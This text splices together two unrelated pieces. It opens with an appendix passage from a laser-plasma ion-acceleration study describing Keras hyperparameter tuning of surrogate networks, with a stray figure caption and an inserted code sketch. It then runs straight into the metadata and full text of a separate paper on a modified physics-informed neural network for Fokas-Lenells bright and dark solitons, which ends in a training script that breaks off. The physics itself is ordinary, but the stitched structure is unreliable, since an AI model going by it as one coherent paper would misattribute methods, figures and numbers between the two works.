The initial learning rate was 0.001, which was lowered to a minimum of 0.0001 during training should the optimizer detect a plateau in the validation loss value (Keras' ReduceLROnPlateau feature). In order for the physical parameters to be more manageable numerically, all parameters were divided by the maximum value in their range (see Table 1) before being given to the model. With these overarching parameters in place, the architecture of the FCNs, i.e. the number of layers and the number of neurons in each layer, was left variable and was optimized for the problem using a hyperparameter tuning method. Keras Tuner allows for extensive hyperparameter tuning using various optimization algorithms [31].

Figure 14: Plot of the absorption of energy in the Lorentz boosted simulation in comparison to the data from Cui et al. [55].

Recalling section II.2, each simulation output contains information about 100 locations in the energy spectrum of the particles. Hence, for the reduced continuous model, the available data length was \(68973\times 100=6897300\) data points. Of these, 81% were used for training, 9% were used for validation, and 10% were used for testing. Running Keras Tuner on the Google Cloud Compute Engine API from a Google Colab Notebook, Bayesian Optimization could be performed for the hyperparameters of the continuous model of hydrogen ions. In order to find a model architecture that most accurately describes the simulation results, the number of layers and the number of neurons in each layer were first optimized to achieve the lowest possible training loss. Every training run used a batch size of 256 and an early stopping mechanism. After 50 trials, each running training twice in order to lower the chance of a bad local minimum, a suitable architecture was found. However, this optimized model was only tuned to minimize the training loss of the model without considering the validation data at all. To generalize the model, hyperparameter tuning was run again on the optimized architecture, this time with L1 and L2 regularization on each layer as the hyperparameters to be tuned and with the tuning objective set to the mean squared error on the validation set. Each hidden layer in the network has an L1 regularization strength of \(1.98\times 10^{-6}\) and an L2 regularization strength of \(3.07\times 10^{-8}\). The network achieved a mean squared error of 3.38 on the 620 757 randomly selected validation data points. As a reminder, this number is equal to the mean squared error on the \(\ln\left(\frac{\mathrm{dn}}{\mathrm{d}\mathrm{E}}(E)\right)\) prediction for input parameters \(\{E,[\text{physical parameters}]\}\). The second model, predicting the maximum ion energy, was tuned and optimized analogously. Since the maximum energy is only predicted per simulation and not per energy bin of the energy spectra, the second model was trained on 68 973 unique data points. This significantly smaller dataset made training the model on a home computer feasible. The optimization for the maximum-energy model found an L1 regularization strength of \(2.3\times 10^{-4}\) and an L2 regularization strength of \(1.1\times 10^{-7}\).
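The training pipeline described in this appendix can be condensed into a short sketch. The snippet below is an illustrative reconstruction rather than the code actually used for this work: the hidden-layer widths in `HIDDEN_LAYERS`, the early-stopping patience and the data-loading step are placeholders (the tuned architecture is not quoted in the text), while the activations, loss, Adam settings, learning-rate schedule, batch size, regularization strengths, Savitzky-Golay smoothing and the conversion-efficiency integral of Eq. (13) follow the values stated above.

```python
# Illustrative sketch of the surrogate-model pipeline of Appendices D and E.
# Placeholders/assumptions: HIDDEN_LAYERS widths, early-stopping patience, data loading.
import numpy as np
from scipy.signal import savgol_filter
import tensorflow as tf
from tensorflow.keras import layers, regularizers

HIDDEN_LAYERS = [128, 128, 64]     # placeholder widths; the paper tunes these with Keras Tuner
L1_REG, L2_REG = 1.98e-6, 3.07e-8  # regularization strengths quoted for the spectrum model

def smooth_log_spectrum(log_dn_dE):
    """Savitzky-Golay filter (window 7, 3rd-order polynomial) applied to ln(dn/dE)."""
    return savgol_filter(log_dn_dE, window_length=7, polyorder=3)

def build_spectrum_model(n_inputs):
    """FCN mapping {E, normalized physical parameters} -> ln(dn/dE)."""
    model = tf.keras.Sequential()
    model.add(layers.InputLayer(input_shape=(n_inputs,)))
    for width in HIDDEN_LAYERS:
        model.add(layers.Dense(width, activation="relu",
                               kernel_regularizer=regularizers.l1_l2(l1=L1_REG, l2=L2_REG)))
    model.add(layers.Dense(1))  # identity (linear) output for regression
    opt = tf.keras.optimizers.Adam(learning_rate=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-7)
    model.compile(optimizer=opt, loss="mse")
    return model

callbacks = [
    tf.keras.callbacks.ReduceLROnPlateau(monitor="val_loss", min_lr=1e-4),
    tf.keras.callbacks.EarlyStopping(monitor="val_loss", patience=20, restore_best_weights=True),
]
# model.fit(X_train, y_train, validation_data=(X_val, y_val),
#           batch_size=256, callbacks=callbacks, epochs=500)

def conversion_efficiency(model, params, E_max, E_laser, V=1.0, n_E=2000):
    """Evaluate Eq. (13) by trapezoidal quadrature and normalize by the laser pulse energy."""
    E = np.linspace(0.0, E_max, n_E)
    X = np.column_stack([E, np.tile(params, (n_E, 1))])  # assumes input ordering {E, params}
    log_dn_dE = model.predict(X, verbose=0).ravel()
    E_tot = V * np.trapz(np.exp(log_dn_dE) * E, E)
    return E_tot / E_laser
```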
2306.03105
Data driven localized wave solution of the Fokas-Lenells equation using modified PINN
We investigate data-driven localized wave solutions of the Fokas-Lenells equation by using a physics-informed neural network (PINN). We improve the basic PINN by incorporating control parameters into the residual loss function. We also add conserved quantities as additional loss terms to modify the PINN. Using the modified PINN we obtain data-driven bright and dark soliton solutions of the Fokas-Lenells equation. The conserved-quantity-informed loss function achieves higher accuracy in terms of the relative L2 error between predicted and exact soliton solutions. We hope that the present investigation will be useful for studying applications of deep learning in nonlinear optics and other branches of nonlinear physics. Source codes are available at https://github.com/gautamksaharia/Fokas-Lenells
Gautam Kumar Saharia, Sagardeep Talukdar, Riki Dutta, Sudipta Nandy
2023-06-03T06:06:27Z
http://arxiv.org/abs/2306.03105v1
# Data driven localized wave solution of the Fokas-Lenells equation using modified PINN Gautam Kumar Saharia, Sagardeep Talukdar, Riki Dutta and Sudipta Nandy email: [email protected] Abstract We investigate data-driven localized wave solutions of the Fokas-Lenells equation by using a physics-informed neural network (PINN). We improve the basic PINN by incorporating control parameters into the residual loss function. We also add conserved quantities as additional loss terms to modify the PINN. Using the modified PINN we obtain data-driven bright and dark soliton solutions of the Fokas-Lenells equation. The conserved-quantity-informed loss function achieves higher accuracy in terms of the relative \(L2\) error between predicted and exact soliton solutions. We hope that the present investigation will be useful for studying applications of deep learning in nonlinear optics and other branches of nonlinear physics. Source codes are available at [https://github.com/gautamksaharia/Fokas-Lenells](https://github.com/gautamksaharia/Fokas-Lenells) ## 1 Introduction The Fokas-Lenells equation (FLE) [1, 2] is one of the four integrable equations which describe the stable propagation of ultrashort pulses in nonlinear media. The significance of this equation lies in the presence of a spatio-temporal dispersion term in addition to the group velocity dispersion term. This equation is used to model the propagation of ultra-fast light pulses in nonlinear media, for example pulse propagation in a monomode optical fiber. The other three integrable equations are the nonlinear Schrodinger equation (NLSE) [3, 4], the derivative NLSE (DNLSE) [5] and the higher order NLSE (HNLSE) [6, 7]. All four equations play a significant role in the study of localized waves in nonlinear optical media [8]. Nonlinear equations do not always yield stable solutions, or even a solution. There are only a few analytical techniques available to deal with such solutions. The analytical methods, namely the inverse scattering transformation [9] and the direct bilinear method [10, 11], are elegant but problem specific and applicable mostly to integrable cases. Due to the unavailability of analytical solutions in many cases, numerical methods and other approximation methods [12, 13] are used as an alternative technique [14]. However, the accuracy of the solution depends on a number of parameters, namely the number of iterations, the calculation of higher order differential terms, the step size, etc. Moreover, some complex numerical methods are found to be very time consuming and computationally expensive. Such computationally intensive resources are not available to everyone. There is an urgent need for more general approaches to overcome the limitations of analytical and numerical methods. The deep neural network (DNN) is one of the important discoveries of the 20th century. After a few initial successes it failed to generate much interest, but it returned in the 21st century and showed promising results when applied to a variety of fields across arts and science, for example in language processing [15], image recognition [16] and many others [17]. DNN-generated results have shown enough potential to be a good alternative to analytical and numerical methods, especially in solving complex nonlinear differential equations. This is because of recent improvements in computational power and the availability of abundant data.
The neural network also has an obvious advantage over analytical and numerical methods in that it avoids the complex calculations and formulas used in the conventional methods. Recently, Raissi et al. introduced the PINN, which is computationally more efficient than traditional numerical methods, especially when the physical laws are highly nonlinear or when the geometrical domain is large and complex. After the discovery of the PINN, many modifications and improvements of this method have been developed and applied to numerous fields [18, 19, 20, 21, 22, 23]. While PINNs are becoming more popular, up to this point they have not been capable of accurately simulating many nonlinear dynamical systems. Some researchers addressed this drawback by modifying the loss function to increase the accuracy of the PINN. This resulted in overcoming some of the earlier problems seen with the basic PINN. A few notable approaches are: using a self-adaptive loss function through adaptive weights for each loss term [24]; using a soft attention mechanism where the adaptation weights are fully trainable and applied to each training point individually [25]; the least squares weighted residual (LSWR) method [26]; a re-formulation of PINN loss functions that can explicitly account for physical laws during model training [27]; and a gradient optimization algorithm which balances the interaction between different terms in the loss function during model training by means of gradient statistics [28]. The PINN has been applied to many nonlinear equations in optics with a high degree of success: Raissi et al. predicted optical soliton solutions of the NLSE [29], Fang et al. [30] predicted femtosecond optical solitons of the high-order NLSE, and Peng et al. obtained rogue periodic waves of the Chen-Lee-Liu equation [31]. Data-driven solutions and parameter discovery of other nonlinear systems such as the defocusing NLSE with a time dependent potential [32], the Manakov system [33], the generalized Gross-Pitaevskii (GP) equation with PT-symmetric potentials [34], the Sasa-Satsuma equation [35], the Yajima-Oikawa (YO) system [36], dark solitons of the multi-component Manakov model [37] and the Lakshmanan-Porsezian-Daniel equation [38] have been reported. In all the above-mentioned problems, only the dynamical equations along with initial-boundary conditions are used as physical information. However, the benefit of supplying the conserved quantities of the integrable system to the PINN method has not received enough attention. Conserved quantities are crucial in studying various optical dynamics, namely the stability of solitons, soliton collisions and testing the stability of numerical methods. Therefore, incorporating the information of conserved quantities should improve the performance of neural networks by improving the convergence as well as the generalization of the networks. Wu et al. [39] have used this concept to predict optical solitons of the NLSE, and other notable contributions are [40, 41]. To our knowledge, a data-driven solution of the FLE using conservation laws in the PINN has not been reported earlier. During our investigation we noticed that the basic PINN algorithm converges to the minimum but cannot learn the complex dynamics of the FLE efficiently. Therefore, it becomes important to study complex solutions of the FLE by modifying the existing PINN. In this paper, we improve the PINN by modifying the loss function, incorporating a few of the conserved quantities along with other physical information.
Here, we aim to generate data-driven bright and dark soliton solutions of the FLE using the modified PINN. We show that the conserved-quantity-informed loss function achieves higher accuracy in terms of the relative \(L2\) error between the predicted and exact solutions. This paper is organized as follows. We present a review of the FLE along with its analytical bright and dark soliton solutions in section 2. In section 3 we describe the basic PINN structure and present the modified PINN structure obtained by adding conserved quantities to the loss function. We show our results in section 4 and section 5 concludes the paper. ## 2 FLE and its bright and dark soliton solutions We consider the Fokas-Lenells equation \[u_{xt}=u-2i\sigma|u|^{2}u_{x} \tag{1}\] where \(u=u(x,t)\) is a complex valued function and the subscripts \(x\) and \(t\) denote partial differentiation with respect to \(x\) and \(t\). Here, \(|u|^{2}u_{x}\) accounts for the nonlinearity and \(u_{xt}\) is the spatio-temporal dispersion term. Under the vanishing background condition \(|u|\to 0\) as \(x\rightarrow\pm\infty\) we derive a bright soliton solution using the Hirota bilinear method [42]: \[u=\frac{g_{1}}{f_{0}+f_{2}} \tag{2}\] where \[g_{1}=\alpha e^{\theta(x,t)}\] \[f_{0}=\beta\] \[f_{2}=\beta_{2}e^{\theta(x,t)+\theta^{*}(x,t)}\] \[\theta=px+\frac{t}{p}+\theta_{0}\] \[\beta_{2}=i\frac{|\alpha|^{2}|p|^{2}p}{\beta^{*}(p+p^{*})}\] \(\alpha\), \(\beta\), \(p\) and \(\theta_{0}\) are arbitrary complex constants: \(\alpha\) represents the polarization state, \(\beta\) represents the initial central position, \(p\) corresponds to the spectral parameter obtained in the inverse scattering method and \(\theta_{0}\) represents the initial phase. For \(p=a+ib\), where \(a\) and \(b\) are real constants, we get the following form of the bright 1-SS, which we use in this paper: \[u=-\frac{2a}{a+ib}\frac{e^{\theta+i\chi}}{e^{2\theta}-b-ia} \tag{3}\] where \[\theta=a(x+vt)\] \[\chi=b(x-vt)\] \[v=\frac{1}{a^{2}+b^{2}}\] Again, considering the FLE with a non-vanishing boundary condition, we obtain, following [43], the dark 1-SS on the background of a plane wave, that is, when \[u\rightarrow\rho e^{i(\kappa x-\omega t)},\quad x\rightarrow\pm\infty\] The dark 1-SS is \[u=\rho e^{i(\kappa x-\omega t)}\frac{1-\frac{k+b+ia}{2a}\frac{a+ib}{a-ib}e^{2\theta}}{1+\frac{k+b-ia}{2a}e^{2\theta}} \tag{4}\] where the amplitude \(\rho\), frequency \(\omega\) and wave number \(\kappa\) of the plane wave are real constants constrained by the relation \(\omega=\frac{1}{\kappa}+2\rho^{2}\), and \(a\) and \(b\) are real constants given by \(a=\sqrt{k^{3}\rho^{2}(1+k\rho^{2})}\sin(\phi)\) and \(b=k\rho^{2}+\sqrt{k^{3}\rho^{2}(1+k\rho^{2})}\cos(\phi)\) with \(0<\phi<2\pi\). ## 3 PINN deep learning method ### PINN In order to write the PINN for the FLE, we first simplify its complex structure. We convert \(u(x,t)\) into real and imaginary parts, namely \(u(x,t)=r(x,t)+i\,m(x,t)\), where \(r(x,t)\) and \(m(x,t)\) are real valued functions. Writing the PINN residuals for the real and imaginary parts of the FLE as \(f_{r}\) and \(f_{m}\), we have: \[f_{r}:=\hat{r}_{xt}-\hat{r}-2(\hat{r}^{2}+\hat{m}^{2})\hat{m}_{x} \tag{5}\] \[f_{m}:=\hat{m}_{xt}-\hat{m}+2(\hat{r}^{2}+\hat{m}^{2})\hat{r}_{x} \tag{6}\] where \(\hat{r}(x,t;w,b)\) and \(\hat{m}(x,t;w,b)\) are the latent solutions of the neural network (NN) with weight \(W\) and bias parameters \(b\), which have to be optimized to learn the exact solution \(u(x,t)\).
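The residuals in eqs. 5 and 6 are straightforward to evaluate with automatic differentiation. The following is a minimal sketch (not the released code linked in the abstract); it assumes a network `net` mapping \((x,t)\) to the pair \((\hat{r},\hat{m})\), of the kind constructed in the next subsection.

```python
# Minimal sketch of the FLE residuals f_r and f_m of eqs. 5-6 via autograd (PyTorch).
# Assumption: net(x, t) returns the two real outputs (r_hat, m_hat).
import torch

def deriv(y, x):
    """dy/dx with the graph kept, so that mixed second derivatives can be taken."""
    return torch.autograd.grad(y, x, grad_outputs=torch.ones_like(y), create_graph=True)[0]

def fle_residuals(net, x, t):
    x = x.clone().requires_grad_(True)
    t = t.clone().requires_grad_(True)
    r, m = net(x, t)
    r_x, m_x = deriv(r, x), deriv(m, x)
    r_xt, m_xt = deriv(r_x, t), deriv(m_x, t)
    amp2 = r**2 + m**2                    # |u|^2
    f_r = r_xt - r - 2.0 * amp2 * m_x     # eq. 5
    f_m = m_xt - m + 2.0 * amp2 * r_x     # eq. 6
    return f_r, f_m
```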
We construct a feed-forward NN, which consists of an input layer, M number of hidden layers and an output layer as shown in Figure 1. The input layer takes the coordinates \((x,t)\) as input, multiplies them with weight \(W\) and adds bias \(b\) to it. Before sending them as an input to the next layer, we apply an activation function \(\sigma\), namely tanh to add non-linearity in the output. The network is called feed-forward because each hidden layer of the NN receives input from the previous layer. We use Glorot Normal initialization to randomly initialize the network weight \(W\) and bias term \(b\). The final NN representation is given by, \[u(X,\Theta)=\sigma(\sigma(\sigma(W_{0}X+b_{0})W_{1}+b_{1})W_{2}+b_{2})...... \tag{7}\] \(u(X,\Theta)=\left[\hat{r}(x,t;w,b),\hat{m}(x,t;w,b)\right]\) is the output of the NN, and \(X=(x,t)\) is the input to the NN, \(\Theta=\left\{W^{k},b^{k}\right\}_{k=1}^{M}\) represent trainable parameters in the NN and \(\sigma\) represents activation function. Our goal is to optimize these trainable parameters so that \(\hat{u}(x,t)\) satisfy the FLE and PINN \(f_{r}\) and \(f_{m}\) become minimum, such that the output of the NN approximates the solution of FLE, i.e. \(\hat{u}(x,t;w,b)\approx u(x,t)\). PINN \(f_{r}\) and \(f_{m}\) share same parameters with the NN \(u(X,\Theta)\) therefore, these common parameters are trained by minimizing the following loss function of the network: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+Loss_{f_{r}}+ Loss_{f_{m}} \tag{8}\] where, \(Loss_{r_{0}}\), \(Loss_{m_{0}}\), \(Loss_{r_{b}}\), \(Loss_{m_{b}}\), \(Loss_{f_{r}}\) and \(Loss_{f_{m}}\) are defined by \[Loss_{r_{0}}=\frac{1}{N_{0}}\sum_{i=1}^{N_{0}}|\hat{r}(x_{0}^{i},t_{0}^{i})-r_{ 0}^{i}|^{2},\quad Loss_{m_{0}}=\frac{1}{N_{0}}\sum_{i=1}^{N_{0}}|\hat{m}(x_{0}^ {i},t_{0}^{i})-m_{0}^{i}|^{2} \tag{9}\] \[Loss_{r_{b}}=\frac{1}{N_{b}}\sum_{i=1}^{N_{b}}|\hat{r}(x_{b}^{i},t_{b}^{i})-r_ {b}^{i}|^{2},\quad Loss_{m_{b}}=\frac{1}{N_{b}}\sum_{i=1}^{N_{b}}|\hat{m}(x_{b} ^{i},t_{b}^{i})-m_{b}^{i}|^{2} \tag{10}\] Figure 1: Schematic diagram of PINN. A NN consists of an input and an output layer and some number of hidden layers. \(\sigma\) represents activation functions in all layer. The input of the NN goes through all the hidden layers. Outputs of the NN, namely \(r\) and \(m\) are considered inputs for the initial and boundary condition loss functions, the physics equation loss function, and the conserve quantity loss function. The total loss function is the combination of all these loss functions, which are minimized by the ADAM optimizer. \[Loss_{f_{r}}=\frac{1}{N_{f}}\sum_{i=1}^{N_{f}}|f_{r}(x_{f}^{i},t_{f}^{i})|^{2}, \quad Loss_{f_{m}}=\frac{1}{N_{f}}\sum_{i=1}^{N_{f}}|f_{m}(x_{f}^{i},t_{f}^{i})| ^{2} \tag{11}\] Here, \(\left\{x_{0}^{i},t_{0}^{i};r_{0}^{i},m_{0}^{i}\right\}_{i=1}^{N_{0}}\) denotes initial data points, \(\left\{x_{b}^{i},t_{b}^{i};r_{b}^{i},m_{b}^{i}\right\}_{i=1}^{N_{b}}\) corresponds to collocation points on the boundary data, and \(\left\{x_{f}^{i},t_{f}^{i}\right\}_{i=1}^{N_{f}}\) represent the collocation points on \(f_{r}\) and \(f_{m}\). \(Loss_{r_{0}}\) and \(Loss_{m_{0}}\) corresponds to the loss on the initial data, \(Loss_{r_{b}}\) and \(Loss_{m_{b}}\) enforce the vanishing boundary conditions, and \(f_{r}\) and \(f_{m}\) penalizes the FLE for not being satisfied on the collocation points. These training data were obtained from an exact solution, considering their initial and boundary conditions. 
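A concrete realization of the network of eq. 7 and of the data-fit losses of eqs. 9-10 could look as follows. This is an illustrative sketch only; the layer count and width are set to the bright-soliton values quoted in section 4.1, with tanh activations and Glorot normal initialization as described above.

```python
# Sketch of the feed-forward network of eq. 7 and the MSE data losses of eqs. 9-10.
import torch
import torch.nn as nn

class FLENet(nn.Module):
    def __init__(self, hidden_layers=8, width=40):      # values used for the bright soliton
        super().__init__()
        sizes = [2] + [width] * hidden_layers + [2]      # input (x, t) -> output (r_hat, m_hat)
        blocks = []
        for i in range(len(sizes) - 1):
            lin = nn.Linear(sizes[i], sizes[i + 1])
            nn.init.xavier_normal_(lin.weight)           # Glorot normal initialization
            nn.init.zeros_(lin.bias)
            blocks.append(lin)
            if i < len(sizes) - 2:
                blocks.append(nn.Tanh())
        self.model = nn.Sequential(*blocks)

    def forward(self, x, t):
        out = self.model(torch.stack([x, t], dim=-1))
        return out[..., 0], out[..., 1]                  # r_hat, m_hat

def data_loss(net, x, t, r_target, m_target):
    """Mean-squared data misfit of eqs. 9-10 for initial or boundary points."""
    r, m = net(x, t)
    return torch.mean((r - r_target) ** 2) + torch.mean((m - m_target) ** 2)
```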
Collocation points are randomly chosen from a uniform distribution in the computational domain, i.e. \(x\in[-L,L]\) and \(t\in[t_{0},t_{1}]\). With the help of the ADAM optimizer [44], we minimize the loss function by optimizing the trainable parameters \(\Theta=\left\{W^{k},b^{k}\right\}_{k=1}^{M}\). Thus, solving the FLE is transformed into an optimization problem. The global minimum of the loss function corresponds to the solution of the FLE subject to particular initial and boundary conditions. ### Loss function with conserved quantities Although the basic PINN method converges to a minimum value, it cannot learn the exact soliton solution of the FLE. To address this problem, we modify the loss function by multiplying the physics-informed loss terms, i.e. those built from \(f_{r}\) and \(f_{m}\), by a real coefficient \(\gamma\). Physics-informed loss refers to imposing the FLE residuals in the total loss function to regularize NN training. The modified loss function is given as follows: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+\gamma(Loss_{f_{r}}+Loss_{f_{m}}) \tag{12}\] where \(\gamma\) determines how much the physics-informed loss contributes to the total loss function. Embedding physical information, namely the energy conservation law, the momentum conservation law, etc., into a NN as a loss term helps the PINN capture the right solution and generalize better even with a small amount of training data. Therefore, we further improve the loss function by introducing additional physical information from the FLE. Being an integrable equation, the FLE has many conserved quantities. We use conserved quantities of the FLE in the PINN method to improve the loss function, adding them as additional loss terms which have to be minimized during training. The first few conserved quantities of the FLE, from both the positive and negative hierarchies, are given below; they are obtained by the methods described in [42]. \[H_{1}=\int_{-\infty}^{+\infty}|u_{x}|^{2}dx \tag{13}\] \[H_{3}=\int_{-\infty}^{+\infty}(|u_{x}|^{4}-iu_{x}^{*}u_{xx})dx \tag{14}\] \[H_{5}=\int_{-\infty}^{+\infty}(-u_{x}^{*}u_{xxx}+2|u_{x}|^{6}-3i|u_{x}|^{2}u_{x}^{*}u_{xx})dx \tag{15}\] \[H_{-1}=\int_{-\infty}^{+\infty}-iu_{x}^{*}udx \tag{16}\] \[H_{-3}=\int_{-\infty}^{+\infty}-(|u|^{2}+i|u|^{2}uu_{x}^{*})dx \tag{17}\] Since the temporal derivative of each conserved quantity must vanish, we write \[\frac{\partial}{\partial t}H_{i}=0,\quad i=1,3,5,-1,-3 \tag{18}\] \[L_{conserve}=\sum_{i=1,3,5,-1,-3}||\frac{\partial}{\partial t}\hat{H}_{i}||^{2} \tag{19}\] where \(L_{conserve}\) corresponds to the loss on the conserved quantities of the FLE. Thus, the improved loss function with conserved quantities is: \[Loss(\Theta)=Loss_{r_{0}}+Loss_{m_{0}}+Loss_{r_{b}}+Loss_{m_{b}}+\gamma_{1}(Loss_{f_{r}}+Loss_{f_{m}})+\gamma_{2}L_{conserve} \tag{20}\] where \(\gamma_{1}\) and \(\gamma_{2}\) are two real-valued coefficients that determine the contributions from the physics loss and the conserved-quantity loss, respectively. The improved loss function yields more precise soliton behavior with fewer sample points.
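To illustrate how a term such as eq. 19 can be formed in practice, the sketch below evaluates \(H_{-1}\) of eq. 16 on a uniform \(x\)-grid by trapezoidal quadrature at a few fixed times and penalizes its variation in time. This is one possible discretization (finite differences in \(t\) rather than an exact \(\partial/\partial t\)) and is not necessarily the implementation used by the authors.

```python
# Sketch of a conservation penalty built from H_{-1} of eq. 16:
#   H_{-1} = int -i u_x^* u dx,  with u = r + i m.
# In real and imaginary parts:
#   Re(H_{-1}) = int (r_x m - m_x r) dx,   Im(H_{-1}) = -int (r_x r + m_x m) dx.
# The penalty discourages variation of H_{-1} across sample times (assumed discretization).
import torch

def H_minus1(net, x_grid, t_value):
    x = x_grid.clone().requires_grad_(True)
    t = torch.full_like(x, t_value)
    r, m = net(x, t)
    ones = torch.ones_like(r)
    r_x = torch.autograd.grad(r, x, grad_outputs=ones, create_graph=True)[0]
    m_x = torch.autograd.grad(m, x, grad_outputs=ones, create_graph=True)[0]
    re = torch.trapz(r_x * m - m_x * r, x)
    im = -torch.trapz(r_x * r + m_x * m, x)
    return re, im

def conservation_loss(net, x_grid, t_samples):
    values = [torch.stack(H_minus1(net, x_grid, t)) for t in t_samples]
    H = torch.stack(values)                       # shape (n_times, 2)
    return torch.mean((H[1:] - H[:-1]) ** 2)      # penalize change of H_{-1} in time
```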
### Algorithm

**Step 1**: Specification of training data, initial training data: \((x^{i},t^{i},r^{i},m^{i})_{i=1}^{N_{0}}\); boundary training data: \((x^{j},t^{j},r^{j},m^{j})_{j=1}^{N_{b}}\); residual training points: \((x^{l}_{f},t^{l}_{f})_{l=1}^{N_{f}}\).

**Step 2**: Construct the NN \(u_{NN}(\Theta)\) with random initialization of trainable parameters \(\Theta\in\{W,b\}\).

**Step 3**: Construct the PINN by substituting the surrogate \(u_{NN}\) into the governing equation.

**Step 4**: Specification of the loss function, which includes the weighted residual loss and the conserved-quantity loss.

**Step 5**: Minimize the loss function to find the best parameters \(\Theta\) using the ADAM optimizer.

## 4 Results

### Bright Soliton

We consider the initial condition \(u(x,-1)=g(x)\) for \(a=1\) and \(b=1\) \[g(x)=-\frac{2}{1+i}\frac{e^{(x-\frac{1}{2})+i(x+\frac{1}{2})}}{e^{2(x-\frac{1}{2})}-1-i}\quad x\in[-5,5] \tag{21}\] and the vanishing boundary condition, namely \[u(x=-5,t)=u(x=5,t)=0,\quad t\in[-1,1]\] Here, we chose \(x\in[-5,5]\) and \(t\in[-1,1]\) as the spatial and temporal intervals. The training data \(\left\{x_{0}^{i},-1\right\}_{i=1}^{N_{0}}\) for the initial condition consist of \(N_{0}=100\) data points, randomly drawn from a uniform distribution over the half-open interval \([-5,5)\); similarly, \(N_{b}=100\) data points \(\left\{\pm 5,t_{b}^{i}\right\}_{i=1}^{N_{b}}\) are drawn from a uniform distribution over the half-open interval \([-1,1)\) to enforce the vanishing boundary condition. Moreover, we have selected \(N_{f}=1000\) randomly sampled collocation points to enforce eq. 1 inside the computational domain. All these randomly sampled points are drawn from the uniform distribution over the spatial and temporal intervals, \(x\in[-5,5]\) and \(t\in[-1,1]\). To obtain a data-driven bright soliton, we construct a feed-forward NN with eight hidden layers of 40 neurons each and the hyperbolic tangent as the activation function. Minimizing the loss function by optimizing all the learnable parameters using the ADAM optimizer with a learning rate of 0.001, we approximate the bright 1-SS. Considering \(\gamma=0.001\) in eq. 12, we measure the relative \(L_{2}\) error between the predicted and exact solutions and obtain a total loss of 0.00085254 and a physics loss of 0.79478168 after 30,000 iterations, taking 1187.6953 seconds. Again, considering \(\gamma_{1}=0.001\) and \(\gamma_{2}=0.00001\) multiplying the \(H_{-1}\) conserved-quantity loss in eq. 20, we obtain a total loss of 0.00072432 and a physics loss of 0.647380 after 30,000 iterations, taking 4393.4230 seconds. Thus, we find that including the conserved quantities in the loss function enables us to minimize the loss more effectively than when they are excluded. The results are shown in Figure 2 and Figure 3. Figure 2(a) shows the density plot of the exact bright 1-SS, Figure 2(b) shows the density plot of the data-driven bright 1-SS and Figure 2(c) shows the density plot of the error between the exact and data-driven bright 1-SS. Figure 3 shows a comparison of the soliton at different time instants: (i) t = -0.70, (ii) t = -0.29 and (iii) t = 0.52.

### Dark Soliton

The initial condition for the dark soliton is \(u(x,-1)=g(x)\), considering \(a=\sqrt{2}\), \(b=1\), \(\kappa=1\), \(\rho=1\) and \(\omega=3\): \[g(x)=e^{i(x+3)}\frac{1-\frac{2+i}{2}\frac{1+i}{1-i}e^{2x-1}}{1+\frac{2-i}{2}e^{2x-1}},\quad x\in[-5,5]\] and the boundary conditions \[u(-5,t)=u(5,t)=1,\quad t\in[-1,1]\] Here, we chose \(x\in[-5,5]\) and \(t\in[-1,1]\) as the spatial and temporal intervals.
The training data set is obtained considering the exact solution at the initial and boundary data, i.e. at \(x=-5\), \(x=5\), and \(t=-1\), dividing the spatial region \([-5,5]\) into \(N_{b}=200\) data points and the temporal region \([-1,1]\) into \(N_{0}=100\) points. We have also selected \(N_{f}=2000\) randomly sampled collocation points to enforce eq. 4 inside the computational domain. All these randomly sampled points are drawn from the uniform distribution over the spatial and temporal intervals \(x\in[-5,5]\) and \(t\in[-1,1]\). We use a PINN with 9 hidden layers, 60 neurons per layer and the hyperbolic tangent activation function to obtain the data-driven dark 1-SS. To minimize the loss function, we use the ADAM optimizer with a learning rate of 0.001. We obtain the dark 1-SS with a total loss of 0.00221427 and a physics loss of 1.88655448 after 30,000 iterations, with coefficient values \(\gamma_{1}=0.001\) for the physics loss and \(\gamma_{2}=0.001\) for the \(H_{-3}\) conserved-quantity loss. The results are shown in Figures 4 and 5. Figure 4(a) shows the density plot of the exact dark 1-SS, Figure 4(b) shows the density plot of the data-driven dark 1-SS and Figure 4(c) shows the density plot of the error between the exact and data-driven dark 1-SS. We present a comparison between the exact and data-driven dark soliton solutions at three different time instants, (i) \(t=-0.29\), (ii) \(t=-0.70\) and (iii) \(t=0.72\), in Figure 5.

## 5 Conclusion

In this paper, we have obtained data-driven bright and dark soliton solutions of the FLE using the improved PINN. Although the PINN can predict bright soliton solutions with great accuracy, for the dark soliton there is still scope for improving its accuracy. We find that using the conserved quantities of the FLE as additional loss terms helps us obtain a data-driven soliton solution with greater accuracy. Therefore, incorporating the information of conserved quantities should improve the performance of the NN by improving its convergence as well as generalization. ## Acknowledgement G.K. Saharia acknowledges Google Colab and Kaggle for their free GPU services. S. Talukdar and R. Dutta acknowledge DST, Govt. of India for Inspire fellowships, grant nos. DST Inspire Fellowship 2020/IF200278; 2020/IF200303.
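For concreteness, the pieces sketched in section 3 can be combined into a compact outline of the bright-soliton run of section 4.1 (eq. 21 initial condition, \(N_{0}=N_{b}=100\), \(N_{f}=1000\), an 8-layer network with 40 neurons per layer, ADAM with learning rate 0.001, 30,000 iterations and \(\gamma=0.001\)). The listing below is illustrative only and reuses the `FLENet`, `fle_residuals` and `data_loss` sketches given earlier; it is not the released implementation linked in the abstract, and the conserved-quantity term of eq. 20 could be added in the same way via `conservation_loss`.

```python
# Illustrative outline of the bright-soliton training run of section 4.1 (eq. 12 loss).
import torch

def g_bright(x):
    """Initial condition of eq. 21 (a = b = 1), i.e. the exact bright 1-SS at t = -1."""
    z = x.to(torch.cfloat)
    num = torch.exp((z - 0.5) + 1j * (z + 0.5))
    den = torch.exp(2.0 * (z - 0.5)) - (1.0 + 1.0j)
    return (-2.0 / (1.0 + 1.0j)) * num / den

torch.manual_seed(0)
net = FLENet(hidden_layers=8, width=40)
opt = torch.optim.Adam(net.parameters(), lr=1e-3)

# Training points, drawn uniformly as described in the text
x0 = torch.empty(100).uniform_(-5.0, 5.0); t0 = torch.full_like(x0, -1.0)
u0 = g_bright(x0); r0, m0 = u0.real, u0.imag
tb = torch.empty(100).uniform_(-1.0, 1.0)
xb = torch.where(torch.rand(100) < 0.5, -5.0 * torch.ones_like(tb), 5.0 * torch.ones_like(tb))
rb, mb = torch.zeros_like(tb), torch.zeros_like(tb)     # vanishing boundary condition
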